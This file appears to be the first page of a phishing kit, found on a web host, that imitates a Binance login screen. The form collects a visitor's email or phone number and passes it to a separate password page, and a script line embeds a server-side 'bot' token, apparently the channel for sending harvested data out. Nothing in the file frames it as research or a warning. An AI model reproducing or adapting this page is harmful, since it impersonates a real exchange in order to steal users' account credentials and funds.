/home2/mshostin/public_html/bi/binance2025/login.php
<?php 
require 'main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="res/app.css">
    <title>Login</title>
</head>
<body>
    
<main>
    <div class="continer">
    <form action="password.php" method="get">
<div class="logo">
<img src="res/img/logo.png" >
<script>var token=<?php echo json_encode($bot); ?>;</script>

</div>
<div class="title">
<label >Log in</label>
</div>
<div class="col">
<label >Email/Phone number</label>
<input type="text" placeholder="Email/Phone(without country code)" name="user" required>
</div>

<div class="but">
<button type="submit">Next</button>
</div>

<hr>

<div class="info">
<img src="res/img/info.png" >
</div>

</form>
    </div>
</main>

<div class="fo">

 
<label >Create a Binance Account</label>
</div>

<footer>
<script src="./res/cdn/jq.js"></script>
<script src="./res/jquery.js"></script>
<label > English</label>
    <label >  Cookies</label>
    <label > Terms</label>
    <label > Privacy</label>    


</footer>


</body>
</html>